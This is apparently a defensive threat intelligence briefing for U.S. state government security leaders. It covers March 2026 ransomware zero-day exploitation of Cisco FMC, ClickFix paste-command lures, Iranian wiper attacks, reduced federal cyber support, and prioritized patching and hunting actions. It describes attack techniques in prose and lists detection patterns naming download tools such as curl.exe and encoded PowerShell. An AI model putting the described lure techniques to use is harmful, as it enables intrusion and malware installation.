Ransomware Groups Are Buying Zero-Days, ClickFix Is the New Macro, and Federal Cyber Support Is Eroding — What State CISOs Must Do This Week

<p>The week of March 10&ndash;18, 2026 delivered a series of developments that, taken individually, would each warrant a security advisory. Taken together, they represent a structural shift in the threat landscape facing U.S. state and local government IT organizations. A ransomware gang exploited a CVSS 10.0 zero-day in Cisco firewall management infrastructure for over a month before anyone noticed. A social engineering technique called &ldquo;ClickFix&rdquo; has been adopted by at least four unrelated threat groups &mdash; including nation-state operators &mdash; and now functions as a universal initial access method that bypasses email security entirely. Iran&rsquo;s retaliatory cyber campaign continues to escalate with a 200,000-device wiper attack on a major U.S. corporation. And the federal agencies that state governments have historically relied on for cyber support are losing staff, delaying regulations, and letting intelligence-sharing authorities lapse &mdash; eight months before the 2026 midterm elections.</p> <p><strong> This is not a drill. This is the new operating environment. </strong></p> <h2><strong> What Changed This Week </strong></h2> <p><strong> Six developments demand immediate attention from state IT leadership: </strong></p> <ol> <li><strong> Interlock ransomware exploited a Cisco Secure Firewall Management Center zero-day (CVE-2026-20131, CVSS 10.0) for 36 days before disclosure </strong> &mdash; and has already hit a U.S. municipal government. This is the first confirmed case of a ransomware group operationalizing a true zero-day in critical network infrastructure.</li> <li><strong> ConnectWise ScreenConnect disclosed a critical session hijacking vulnerability (CVE-2026-3564, CVSS 9.0) </strong> that allows attackers to forge admin sessions using extracted cryptographic keys. On-premises instances require manual patching &mdash; cloud instances were auto-updated.</li> <li><strong> ClickFix social engineering has been adopted by four or more distinct threat groups </strong> , including the LeakNet and Interlock ransomware gangs, the Termite/Velvet Tempest ransomware operation, and Russia&rsquo;s APT28 (Fancy Bear). The technique tricks users into pasting malicious commands from websites into Windows Terminal &mdash; completely bypassing email-based security controls.</li> <li><strong> Iran-linked Handala (UNC5203) continues its post-Operation Epic Fury retaliation campaign. </strong> The Stryker wiper attack &mdash; claiming 200,000 devices destroyed &mdash; has generated class action lawsuits as of March 18, while the company still works to restore global IT systems.</li> <li><strong> CISA workforce reductions, CIRCIA regulatory delays, and the pending expiration of the 2015 cyber threat intelligence sharing framework (September 2026) </strong> are eroding the federal support structure that state governments depend on for election security, incident response, and threat intelligence.</li> <li><strong> Critical perimeter vulnerabilities across Fortinet and Cisco products are under active exploitation. </strong> FortiGate CVE-2025-59718 (CVSS 9.8) is being used to create rogue admin accounts in the wild, FortiVoice/Mail/NDR CVE-2025-32756 (CVSS 9.8) enables unauthenticated RCE, and Trane Tracer BMS vulnerabilities (CVE-2026-28252 through CVE-2026-28256) expose building management systems via hardcoded credentials and authentication bypass.</li> </ol> <h2><strong> Threat Timeline: Key Events (January &ndash; March 2026) </strong></h2> <table> <thead> <tr> <th> <p><strong> Date </strong></p> </th> <th> <p><strong> Event </strong></p> </th> <th> <p><strong> Significance </strong></p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong> Jan 26 </strong></p> </td> <td> <p>Interlock begins exploiting CVE-2026-20131 (Cisco FMC)</p> </td> <td> <p>Zero-day exploitation begins &mdash; 36 days before public disclosure</p> </td> </tr> <tr> <td> <p><strong> Feb 2 </strong></p> </td> <td> <p>Qilin ransomware claims Tulsa airport breach</p> </td> <td> <p>Continued municipal government targeting by established ransomware group</p> </td> </tr> <tr> <td> <p><strong> Feb 25 </strong></p> </td> <td> <p>Cisco discloses CVE-2026-20127 (SD-WAN Manager, CVSS 10.0)</p> </td> <td> <p>Added to CISA KEV; second critical Cisco infrastructure vulnerability in weeks</p> </td> </tr> <tr> <td> <p><strong> Mar 4 </strong></p> </td> <td> <p>Cisco patches CVE-2026-20131 (FMC)</p> </td> <td> <p>Disclosure ends Interlock&rsquo;s zero-day window &mdash; but damage already done</p> </td> </tr> <tr> <td> <p><strong> Mar 4&ndash;5 </strong></p> </td> <td> <p>Europol/Microsoft take down Tycoon2FA PhaaS platform</p> </td> <td> <p>Major AiTM phishing-as-a-service disrupted; successor &ldquo;Starkiller&rdquo; already identified</p> </td> </tr> <tr> <td> <p><strong> Mar 7 </strong></p> </td> <td> <p>Termite/Velvet Tempest adopts ClickFix + CastleRAT</p> </td> <td> <p>Second ransomware group adopts ClickFix for initial access</p> </td> </tr> <tr> <td> <p><strong> Mar 10 </strong></p> </td> <td> <p>SentinelOne reports FortiGate SSO bypass exploitation (CVE-2025-59718)</p> </td> <td> <p>Rogue admin accounts being created on FortiGate firewalls in the wild</p> </td> </tr> <tr> <td> <p><strong> Mar 11&ndash;13 </strong></p> </td> <td> <p>Handala claims Stryker wiper attack; 200K devices reported wiped</p> </td> <td> <p>Largest Iranian destructive cyber operation against a U.S. company to date</p> </td> </tr> <tr> <td> <p><strong> Mar 13 </strong></p> </td> <td> <p>Chrome 146 emergency patches for two zero-days</p> </td> <td> <p>Active exploitation in the wild; enterprise browser fleets at risk</p> </td> </tr> <tr> <td> <p><strong> Mar 16 </strong></p> </td> <td> <p>CNAS reports: Congress has twice let cyber intel sharing authority lapse</p> </td> <td> <p>CISA 2015 voluntary sharing framework expires September 2026</p> </td> </tr> <tr> <td> <p><strong> Mar 17 </strong></p> </td> <td> <p>LeakNet ransomware debuts with ClickFix + Deno in-memory loader</p> </td> <td> <p>New ransomware actor; third group to adopt ClickFix in two weeks</p> </td> </tr> <tr> <td> <p><strong> Mar 17 </strong></p> </td> <td> <p>Reporting confirms CISA election security staff and programs &ldquo;hollowed out&rdquo;</p> </td> <td> <p>State governments losing federal cyber support ahead of 2026 midterms</p> </td> </tr> <tr> <td> <p><strong> Mar 17 </strong></p> </td> <td> <p>Trane Tracer BMS vulnerabilities disclosed (CVE-2026-28252 through CVE-2026-28256)</p> </td> <td> <p>Hardcoded credentials and auth bypass in building management systems</p> </td> </tr> <tr> <td> <p><strong> Mar 18 </strong></p> </td> <td> <p>Amazon reveals Interlock&rsquo;s 36-day Cisco FMC zero-day exploitation; city of Saint Paul named as victim</p> </td> <td> <p>Ransomware-as-zero-day confirmed; government targeting confirmed</p> </td> </tr> <tr> <td> <p><strong> Mar 18 </strong></p> </td> <td> <p>ConnectWise discloses CVE-2026-3564 (ScreenConnect, CVSS 9.0)</p> </td> <td> <p>Critical supply chain risk for any agency using on-premises ScreenConnect</p> </td> </tr> </tbody> </table> <h2><strong> Threat Analysis </strong></h2> <h3><strong> 1. Interlock Ransomware and the Cisco FMC Zero-Day: A New Paradigm </strong></h3> <p>The most consequential development this week is not just another vulnerability &mdash; it is a capability shift. The Interlock ransomware gang possessed and operationalized a zero-day exploit in Cisco Secure Firewall Management Center (CVE-2026-20131) for <strong> 36 days </strong> before Cisco&rsquo;s March 4 patch. Amazon&rsquo;s threat intelligence team confirmed exploitation dating to January 26, 2026.</p> <p>This matters because ransomware groups have historically been &ldquo;N-day&rdquo; operators &mdash; they exploit known vulnerabilities after patches are released, targeting organizations that are slow to update. A financially motivated criminal group acquiring and deploying a zero-day in critical network management infrastructure was, until now, a capability associated exclusively with nation-state actors.</p> <p><strong> CVE-2026-20131 </strong> is a Java deserialization vulnerability in the Cisco FMC web management interface that allows unauthenticated remote code execution as root. CVSS score: <strong> 10.0 </strong> &mdash; the maximum possible severity. Interlock&rsquo;s post-exploitation toolkit included <strong> NodeSnake RAT </strong> (a JavaScript-based remote access trojan using WebSocket C2 with RC4 encryption), <strong> Slopoly </strong> (an AI-generated backdoor that evades signature-based detection), and the <strong> ClickFix </strong> social engineering technique for additional access vectors.</p> <p>Confirmed victims include the <strong> city of Saint Paul </strong> (municipal government), Texas Tech University System, DaVita, and Kettering Health. Given the 36-day exploitation window, additional victims &mdash; potentially including state agencies &mdash; may not yet be publicly known.</p> <p><strong> The bottom line for state CISOs: </strong> If your organization operates Cisco Secure Firewall Management Center, treat this as a confirmed breach scenario until you can verify patch status and complete a threat hunt. The exploitation window was long enough that patching alone is insufficient &mdash; you need to look for evidence of compromise.</p> <h3><strong> 2. ClickFix: The New Macro </strong></h3> <p>Between March 7 and March 18, the ClickFix social engineering technique was adopted by at least four distinct, unrelated threat groups:</p> <ul> <li><strong> LeakNet </strong> ransomware (ClickFix via compromised WordPress sites &rarr; Deno in-memory loader &rarr; ransomware)</li> <li><strong> Interlock </strong> ransomware (ClickFix as an auxiliary initial access vector alongside the Cisco FMC exploit)</li> <li><strong> Termite / Velvet Tempest </strong> ransomware (ClickFix &rarr; CastleRAT + DonutLoader &rarr; ransomware)</li> <li><strong> APT28 / Fancy Bear </strong> (Russia &mdash; ClickFix via fake reCAPTCHA pages for credential theft)</li> </ul> <p>Additionally, multiple infostealer campaigns are using ClickFix across 250+ compromised WordPress sites, and at least one compromised U.S. Senate candidate&rsquo;s official website was observed serving ClickFix lures.</p> <p><strong> How ClickFix works: </strong> Victims visit a compromised or malicious website that displays a fake error message &mdash; often mimicking a browser update, CAPTCHA verification, or document viewer. The page instructs the user to &ldquo;fix&rdquo; the error by copying a command and pasting it into Windows Terminal, the Run dialog, or PowerShell. The pasted command downloads and executes malware. The technique is devastatingly simple and effective because it exploits user trust and bypasses every email-based security control state agencies have invested in.</p> <p><strong> Why this matters for state government: </strong> State employees routinely visit external websites &mdash; news outlets, vendor portals, legislative reference sites, constituent service platforms. Any of these could be compromised to serve ClickFix lures. The technique requires no email delivery, no attachment, and no exploit &mdash; just a user following instructions on a webpage.</p> <h3><strong> 3. Iranian Cyber Retaliation: Escalating and Expanding </strong></h3> <p>The post-Operation Epic Fury Iranian cyber retaliation campaign continues to escalate. The Handala group (also tracked as <strong> UNC5203 </strong> and <strong> Cotton Sandstorm </strong> by Microsoft) claimed responsibility for a wiper attack on Stryker, a major U.S. medical device manufacturer, asserting that 200,000 devices were destroyed. As of March 18, class action lawsuits are accumulating while Stryker continues restoration efforts.</p> <p>Handala/UNC5203 is assessed to be linked to Iran&rsquo;s <strong> Islamic Revolutionary Guard Corps (IRGC) </strong> . Their targeting profile includes U.S. government, energy, financial services, and technology sectors. Separately, <strong> MuddyWater </strong> &mdash; a distinct Iranian threat group affiliated with Iran&rsquo;s <strong> Ministry of Intelligence and Security (MOIS) </strong> &mdash; continues operations using the <strong> Dindoor </strong> backdoor, and broader Iranian cyber activity remains at elevated tempo.</p> <p><strong> For state government: </strong> Iran&rsquo;s retaliatory operations have explicitly targeted U.S. government entities. State agencies &mdash; particularly those managing critical infrastructure (water, energy, transportation) &mdash; are within the target set. The Stryker attack demonstrated that Iranian actors are willing and capable of deploying destructive wiper malware at scale against U.S. organizations.</p> <h3><strong> 4. The Federal Support Gap: CISA Erosion and Regulatory Uncertainty </strong></h3> <p>State governments have historically relied on CISA for election security support, incident response assistance, and threat intelligence sharing. Three concurrent developments are undermining that support structure:</p> <ul> <li><strong> Workforce reductions </strong> have &ldquo;hollowed out key staff and programs&rdquo; that helped states safeguard voting systems, per multiple reports from March 17.</li> <li><strong> CIRCIA (Cyber Incident Reporting for Critical Infrastructure Act) implementation </strong> has been delayed &mdash; DHS shutdown postponed town halls, and the final rule timeline has slipped.</li> <li><strong> The CISA 2015 voluntary cyber threat intelligence sharing framework expires in September 2026. </strong> Congress has already twice allowed related cyber threat intelligence sharing authorization to lapse in the past five months.</li> </ul> <p>This creates a compounding problem: the threat environment is intensifying (ransomware zero-days, Iranian retaliation, ClickFix proliferation) at the exact moment that federal support capacity is diminishing. State CISOs who have relied on federal partnerships must now build or strengthen organic capabilities and peer-to-peer sharing networks.</p> <h3><strong> 5. Supply Chain and Perimeter Vulnerabilities: Cisco, Fortinet, ConnectWise </strong></h3> <p>State government IT infrastructure faces simultaneous critical vulnerabilities across three major vendors:</p> <table> <thead> <tr> <th> <p><strong> Vendor / Product </strong></p> </th> <th> <p><strong> CVE </strong></p> </th> <th> <p><strong> CVSS </strong></p> </th> <th> <p><strong> Status </strong></p> </th> <th> <p><strong> Risk to State IT </strong></p> </th> </tr> </thead> <tbody> <tr> <td> <p>Cisco Secure FMC</p> </td> <td> <p>CVE-2026-20131</p> </td> <td> <p>10.0</p> </td> <td> <p>Active zero-day exploitation (since Jan 26)</p> </td> <td> <p><strong> Critical </strong> &mdash; firewall management compromise enables full network access</p> </td> </tr> <tr> <td> <p>Cisco SD-WAN Manager</p> </td> <td> <p>CVE-2026-20127</p> </td> <td> <p>10.0</p> </td> <td> <p>CISA KEV; active exploitation confirmed</p> </td> <td> <p><strong> Critical </strong> &mdash; inter-agency WAN fabric at risk</p> </td> </tr> <tr> <td> <p>Fortinet FortiGate</p> </td> <td> <p>CVE-2025-59718</p> </td> <td> <p>9.8</p> </td> <td> <p>Active exploitation; rogue admin accounts observed</p> </td> <td> <p><strong> High </strong> &mdash; perimeter firewall compromise; credential and config theft</p> </td> </tr> <tr> <td> <p>Fortinet FortiVoice/Mail/NDR</p> </td> <td> <p>CVE-2025-32756</p> </td> <td> <p>9.8</p> </td> <td> <p>Active exploitation</p> </td> <td> <p><strong> High </strong> &mdash; RCE via crafted HTTP cookie across multiple Fortinet products</p> </td> </tr> <tr> <td> <p>ConnectWise ScreenConnect</p> </td> <td> <p>CVE-2026-3564</p> </td> <td> <p>9.0</p> </td> <td> <p>Exploitation attempts observed; on-prem requires manual patch</p> </td> <td> <p><strong> High </strong> &mdash; IT support tool compromise = full remote access to endpoints</p> </td> </tr> <tr> <td> <p>Trane Tracer BMS</p> </td> <td> <p>CVE-2026-28252 &ndash; 28256</p> </td> <td> <p>Varies</p> </td> <td> <p>Disclosed; patches available</p> </td> <td> <p><strong> Medium-High </strong> &mdash; hardcoded credentials and auth bypass in building management</p> </td> </tr> </tbody> </table> <h2><strong> Predictive Analysis: What Comes Next </strong></h2> <p>Based on the intelligence collected through March 18, 2026, we assess the following probabilities for the next 7&ndash;30 days:</p> <table> <thead> <tr> <th> <p><strong> Scenario </strong></p> </th> <th> <p><strong> Probability </strong></p> </th> <th> <p><strong> Basis </strong></p> </th> </tr> </thead> <tbody> <tr> <td> <p>Additional ClickFix-based ransomware campaigns emerge targeting government</p> </td> <td> <p><strong> High (75%) </strong></p> </td> <td> <p>Four groups adopted the technique in two weeks; it is trivially replicable and bypasses email security</p> </td> </tr> <tr> <td> <p>Interlock claims additional government/education/healthcare victims from the Jan 26 &ndash; Mar 4 exploitation window</p> </td> <td> <p><strong> Moderate-High (60%) </strong></p> </td> <td> <p>36-day zero-day window against internet-facing management consoles; victim discovery typically lags exploitation by weeks</p> </td> </tr> <tr> <td> <p>Iranian cyber operations expand to additional U.S. critical infrastructure or government targets</p> </td> <td> <p><strong> Moderate (45%) </strong></p> </td> <td> <p>Handala/UNC5203 and MuddyWater remain active; post-Operation Epic Fury retaliation tempo has not decreased</p> </td> </tr> <tr> <td> <p>A U.S. state or local government entity is publicly named as a ransomware victim</p> </td> <td> <p><strong> Moderate (40%) </strong></p> </td> <td> <p>Elevated activity across Interlock, Qilin, and LeakNet; municipal government is a confirmed target for multiple groups</p> </td> </tr> <tr> <td> <p>CVE-2026-3564 (ScreenConnect) is exploited in the wild against MSP/government targets</p> </td> <td> <p><strong> Moderate (40%) </strong></p> </td> <td> <p>Exploitation attempts already observed; ScreenConnect is widely deployed in government IT support</p> </td> </tr> <tr> <td> <p>Successor AiTM phishing platforms (Starkiller) reach operational scale, targeting M365 GCC tenants</p> </td> <td> <p><strong> Low-Moderate (30%) </strong></p> </td> <td> <p>Tycoon2FA takedown created a temporary gap; criminal ecosystem historically reconstitutes within 4&ndash;6 weeks</p> </td> </tr> </tbody> </table> <h2><strong> SOC Operational Guidance </strong></h2> <h3><strong> Detection Priorities </strong></h3> <p><strong> ClickFix Execution Chain </strong> &mdash; The highest-priority detection gap for most state SOCs today.</p> <ul> <li><strong> Hunt Hypothesis: </strong> State employees visiting compromised websites are being instructed to paste malicious commands into Windows Terminal, PowerShell, or the Run dialog. Look for command-line processes spawned from unusual parent processes.</li> <li><strong> Detection Logic: </strong></li> </ul> <ul> <li>PowerShell or cmd.exe spawned by Windows Terminal (WindowsTerminal.exe) with Base64-encoded arguments &mdash; <strong> T1059.001 (PowerShell), T1204.001 (User Execution: Malicious Link) </strong></li> <li>mshta.exe or wscript.exe invocations originating from explorer.exe clipboard operations &mdash; <strong> T1218.005 (Mshta) </strong></li> <li>Any execution of deno.exe on state endpoints (Deno runtime should not exist in standard government builds) &mdash; <strong> T1059.007 (JavaScript), T1620 (Reflective Code Loading) </strong></li> <li>curl.exe or Invoke-WebRequest commands executed interactively (not from scheduled tasks or known automation) &mdash; <strong> T1105 (Ingress Tool Transfer) </strong></li> </ul> <p><strong> Cisco FMC Compromise Indicators </strong></p> <ul> <li><strong> Hunt Hypothesis: </strong> If your organization runs Cisco Secure FMC, the 36-day exploitation window (Jan 26 &ndash; Mar 4) may have been used to establish persistent access.</li> <li><strong> Detection Logic: </strong></li> </ul> <ul> <li>Unexpected Java process execution on FMC appliances &mdash; <strong> T1190 (Exploit Public-Facing Application) </strong></li> <li>WebSocket connections from FMC to external IPs (NodeSnake RAT C2 uses WebSocket with RC4 encryption) &mdash; <strong> T1071.001 (Web Protocols) </strong></li> <li>New or modified user accounts on FMC that were not created through change management &mdash; <strong> T1136 (Create Account) </strong></li> <li>SSH lateral movement from FMC to internal Linux hosts &mdash; <strong> T1021.004 (SSH) </strong></li> </ul> <p><strong> FortiGate Rogue Account Detection </strong></p> <ul> <li><strong> Hunt Hypothesis: </strong> Attackers exploiting CVE-2025-59718 are creating unauthorized admin accounts and exfiltrating firewall configurations.</li> <li><strong> Detection Logic: </strong></li> </ul> <ul> <li>Audit all FortiGate admin accounts against authorized personnel lists &mdash; <strong> T1078 (Valid Accounts) </strong></li> <li>Review Sieve mail forwarding rules for unauthorized entries &mdash; <strong> T1114.003 (Email Forwarding Rule) </strong></li> <li>Check for configuration exports or SNMP community string changes &mdash; <strong> T1005 (Data from Local System) </strong></li> </ul> <p><strong> ConnectWise ScreenConnect Session Hijacking </strong></p> <ul> <li><strong> Hunt Hypothesis: </strong> Attackers with access to ScreenConnect server cryptographic material can forge admin sessions.</li> <li><strong> Detection Logic: </strong></li> </ul> <ul> <li>Monitor for ScreenConnect admin sessions originating from unexpected IP ranges &mdash; <strong> T1219 (Remote Access Software) </strong></li> <li>Audit ScreenConnect server access logs for access to configs, backups, logs, and extensions directories &mdash; <strong> T1078 (Valid Accounts), T1068 (Exploitation for Privilege Escalation) </strong></li> </ul> <p><strong> Iranian Wiper Preparedness </strong></p> <ul> <li><strong> Hunt Hypothesis: </strong> Iranian threat actors (Handala/UNC5203, IRGC-affiliated) may target state government systems with destructive wiper malware, potentially leveraging compromised identity infrastructure (Active Directory, Intune/SCCM).</li> <li><strong> Detection Logic: </strong></li> </ul> <ul> <li>Mass file deletion or overwrite operations across multiple systems simultaneously &mdash; <strong> T1485 (Data Destruction) </strong></li> <li>Unexpected service stops across critical infrastructure &mdash; <strong> T1489 (Service Stop) </strong></li> <li>Anomalous Intune/SCCM policy deployments outside change windows &mdash; <strong> T1072 (Software Deployment Tools) </strong></li> </ul> <h3><strong> Blocking Guidance </strong></h3> <p>Specific IOCs (IP addresses, domains, and file hashes) for the campaigns discussed in this report are available through <strong> Anomali ThreatStream </strong> and partner feeds. State SOC teams should ensure the following threat intelligence feeds are active and ingesting:</p> <ul> <li>Amazon AWS Security Blog IOCs (Interlock/Cisco FMC campaign)</li> <li>CISA KEV catalog (CVE-2026-20127, CVE-2026-20131)</li> <li>MS-ISAC advisories for state/local government</li> </ul> <h2><strong> Sector-Specific Defensive Priorities </strong></h2> <h3><strong> State Government Agencies (Executive, Legislative, Judicial) </strong></h3> <ul> <li><strong> Priority 1: </strong> Verify Cisco Secure FMC and SD-WAN Manager patch status across all agencies. Conduct threat hunt on FMC appliances for the Jan 26 &ndash; Mar 4 exploitation window.</li> <li><strong> Priority 2: </strong> Issue ClickFix awareness alert to all state employees with visual examples of the fake error messages. Emphasize: never paste commands from websites into any command prompt or terminal.</li> <li><strong> Priority 3: </strong> Audit ConnectWise ScreenConnect instances used by IT help desks. Confirm on-premises instances are updated to version 26.1.</li> <li><strong> Priority 4: </strong> Begin contingency planning for reduced CISA support. Engage MS-ISAC and state CISO council for alternative threat intelligence sharing.</li> </ul> <h3><strong> Financial Services (State Treasury, Revenue, Payment Processing) </strong></h3> <ul> <li><strong> Priority 1: </strong> Review third-party payment processor security posture. The ScreenConnect vulnerability creates supply chain risk for vendors providing citizen payment portal support.</li> <li><strong> Priority 2: </strong> Strengthen AiTM phishing defenses for financial systems. The Starkiller PhaaS successor to Tycoon2FA specifically targets M365 credentials &mdash; enforce hardware token MFA and conditional access policies requiring compliant devices.</li> <li><strong> Priority 3: </strong> Iranian threat actors (Handala/UNC5203 and MuddyWater) explicitly target financial services. Ensure wire transfer and payment authorization systems have out-of-band verification procedures.</li> </ul> <h3><strong> Energy and Water (State-Regulated Utilities, OT/ICS) </strong></h3> <ul> <li><strong> Priority 1: </strong> Assess Trane Tracer BMS exposure in state-managed facilities. CVE-2026-28252 through CVE-2026-28256 include hardcoded credentials and authentication bypass vulnerabilities enabling root access. Patch to Tracer SC+ v6.30.2313.</li> <li><strong> Priority 2: </strong> Segment OT/SCADA networks from enterprise IT. Iranian threat actors have demonstrated willingness to target critical infrastructure, and the Dragos OT threat report (March 2026) warns of state-affiliated actors pre-positioning for OT attacks that operators may not detect.</li> <li><strong> Priority 3: </strong> Ensure Cisco SD-WAN infrastructure connecting utility control centers is patched against CVE-2026-20127 (CVSS 10.0, CISA KEV).</li> </ul> <h3><strong> Healthcare (State Health Agencies, Medicaid Systems) </strong></h3> <ul> <li><strong> Priority 1: </strong> The Stryker wiper attack demonstrates that healthcare-adjacent organizations are active Iranian targets. Review backup and recovery procedures for health information systems.</li> <li><strong> Priority 2: </strong> Interlock ransomware has confirmed healthcare victims (DaVita, Kettering Health). Ensure healthcare data systems have network segmentation, offline backups, and tested restoration procedures.</li> <li><strong> Priority 3: </strong> Qilin ransomware continues to target government and healthcare globally. Monitor for Qilin indicators via MS-ISAC and sector ISACs.</li> </ul> <h3><strong> Aviation and Transportation / Logistics </strong></h3> <ul> <li><strong> Priority 1: </strong> Qilin ransomware claimed the Tulsa airport breach (February 2026). State-managed airports and transportation authorities should verify ransomware resilience &mdash; particularly backup integrity and network segmentation of operational technology.</li> <li><strong> Priority 2: </strong> Cisco SD-WAN infrastructure connecting transportation management centers is at risk from CVE-2026-20127. Verify patch status.</li> <li><strong> Priority 3: </strong> Supply chain risk from compromised MSP tools (ScreenConnect) extends to transportation logistics vendors. Audit vendor remote access tools.</li> </ul> <h2><strong> Prioritized Defense Recommendations </strong></h2> <h3><strong> Immediate (24&ndash;48 Hours) </strong></h3> <table> <thead> <tr> <th> <p><strong> # </strong></p> </th> <th> <p><strong> Action </strong></p> </th> <th> <p><strong> Owner </strong></p> </th> </tr> </thead> <tbody> <tr> <td> <p>1</p> </td> <td> <p><strong> Verify Cisco Secure FMC patch status </strong> against CVE-2026-20131 (CVSS 10.0). If unpatched, initiate emergency patching and threat hunt for indicators of compromise from the Jan 26 &ndash; Mar 4 exploitation window.</p> </td> <td> <p>Network Security</p> </td> </tr> <tr> <td> <p>2</p> </td> <td> <p><strong> Verify ConnectWise ScreenConnect on-premises instances </strong> are updated to version 26.1. Restrict access to server configuration and backup directories.</p> </td> <td> <p>IT Support / Endpoint Management</p> </td> </tr> <tr> <td> <p>3</p> </td> <td> <p><strong> Push Chrome 146.0.7680.75+ </strong> to all managed endpoints via enterprise browser management. Two zero-days are under active exploitation.</p> </td> <td> <p>Endpoint Management</p> </td> </tr> <tr> <td> <p>4</p> </td> <td> <p><strong> Issue ClickFix awareness communication </strong> to all state employees. Include visual examples of fake error messages. Key message: <em> Never copy and paste commands from a website into any command prompt, terminal, or Run dialog. </em></p> </td> <td> <p>CISO Office / Security Awareness</p> </td> </tr> <tr> <td> <p>5</p> </td> <td> <p><strong> Brief executive leadership </strong> on the Interlock zero-day, Iranian wiper escalation, and CISA support erosion. Frame as a risk posture change requiring sustained attention, not a single incident.</p> </td> <td> <p>CISO</p> </td> </tr> </tbody> </table> <h3><strong> 7-Day Actions </strong></h3> <table> <thead> <tr> <th> <p><strong> # </strong></p> </th> <th> <p><strong> Action </strong></p> </th> <th> <p><strong> Owner </strong></p> </th> </tr> </thead> <tbody> <tr> <td> <p>6</p> </td> <td> <p><strong> Audit all FortiGate firewall admin accounts </strong> against authorized personnel lists. Check for rogue accounts, unauthorized Sieve forwarding rules, and configuration exports. Verify patch status against CVE-2025-59718 (CVSS 9.8).</p> </td> <td> <p>Network Security</p> </td> </tr> <tr> <td> <p>7</p> </td> <td> <p><strong> Inventory Trane Tracer BMS systems </strong> across all state-managed facilities. Schedule patching to Tracer SC+ v6.30.2313 for CVE-2026-28252 through CVE-2026-28256.</p> </td> <td> <p>Facilities / OT Security</p> </td> </tr> <tr> <td> <p>8</p> </td> <td> <p><strong> Verify Cisco SD-WAN Manager </strong> instances are at release 20.18+ per CISA KEV for CVE-2026-20127 (CVSS 10.0).</p> </td> <td> <p>Network Security</p> </td> </tr> <tr> <td> <p>9</p> </td> <td> <p><strong> Engage MS-ISAC and state CISO council </strong> to identify alternative threat intelligence sharing mechanisms in anticipation of the CISA 2015 framework expiration (September 2026).</p> </td> <td> <p>CISO Office / Policy</p> </td> </tr> <tr> <td> <p>10</p> </td> <td> <p><strong> Review M365 conditional access policies. </strong> Enforce compliant device requirements and implement token binding where available to counter AiTM/Starkiller phishing.</p> </td> <td> <p>IAM / Cloud Security</p> </td> </tr> </tbody> </table> <h3><strong> 30-Day Actions </strong></h3> <table> <thead> <tr> <th> <p><strong> # </strong></p> </th> <th> <p><strong> Action </strong></p> </th> <th> <p><strong> Owner </strong></p> </th> </tr> </thead> <tbody> <tr> <td> <p>11</p> </td> <td> <p><strong> Deploy ClickFix detection rules </strong> in EDR/SIEM: clipboard-paste execution via Windows Terminal, PowerShell with encoded commands spawned from explorer.exe, Deno runtime execution on any endpoint.</p> </td> <td> <p>Detection Engineering</p> </td> </tr> <tr> <td> <p>12</p> </td> <td> <p><strong> Conduct Iranian wiper tabletop exercise. </strong> Scenario: Handala/UNC5203 (IRGC-affiliated) deploys destructive malware via compromised identity infrastructure (AD/Intune). Test backup restoration for Active Directory, M365, and critical agency systems. Validate that recovery time objectives are achievable.</p> </td> <td> <p>CISO Office / IR Team</p> </td> </tr> <tr> <td> <p>13</p> </td> <td> <p><strong> Perform Cisco product inventory </strong> across all agencies. Two independent CVSS 10.0 exploitation campaigns targeting different Cisco products in the same quarter represents systemic vendor concentration risk. Establish a unified Cisco vulnerability response process.</p> </td> <td> <p>Enterprise Architecture / Network Security</p> </td> </tr> <tr> <td> <p>14</p> </td> <td> <p><strong> Evaluate browser isolation solutions </strong> to address the ClickFix gap. Current security architecture is optimized for email-borne threats; ClickFix operates entirely through web browsing and bypasses that investment.</p> </td> <td> <p>Security Architecture</p> </td> </tr> <tr> <td> <p>15</p> </td> <td> <p><strong> Review and update election security incident response plans </strong> for 2026 midterms, accounting for reduced CISA support capacity. Identify state-level resources and mutual aid agreements that can fill the gap.</p> </td> <td> <p>CISO Office / Elections IT</p> </td> </tr> </tbody> </table> <h2><strong> Bottom Line&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</strong></h2> <p>Three structural shifts are converging to create the most challenging threat environment state government CISOs have faced:</p> <p><strong> First, the capability gap between nation-states and criminal groups is closing. </strong> Interlock&rsquo;s use of a zero-day in Cisco FMC &mdash; a capability that would have been remarkable for a nation-state five years ago &mdash; signals that the ransomware ecosystem has matured to the point where criminal operators can acquire or develop zero-day exploits for critical infrastructure. The deployment of AI-generated malware (Slopoly) in the same campaign further demonstrates that criminal groups are adopting advanced techniques at an accelerating pace.</p> <p><strong> Second, initial access techniques are evolving faster than defenses. </strong> State governments invested heavily in email security &mdash; and those investments still matter. But ClickFix renders them partially irrelevant by moving the initial access vector to the web browser. Four unrelated threat groups adopted the same technique within two weeks. This is the kind of rapid, cross-ecosystem adoption that characterized macro-enabled document attacks in the 2018&ndash;2022 era. The defense community is behind the curve.</p> <p><strong> Third, the federal safety net is fraying. </strong> CISA workforce reductions, CIRCIA implementation delays, and the pending expiration of intelligence sharing authorities are not abstract policy concerns &mdash; they directly affect the threat intelligence, incident response support, and election security assistance that state governments receive. State CISOs who have relied on federal partnerships must now build or strengthen organic capabilities and peer-to-peer sharing networks.</p> <p>None of these shifts will reverse themselves. The question is not whether state government will face a major cyber incident in 2026 &mdash; it is whether your organization will be prepared when it happens.</p> <p>Patch the Cisco FMC. Update ScreenConnect. Warn your employees about ClickFix. Hunt your networks. Test your backups. And start planning for a world where you may need to stand on your own.</p>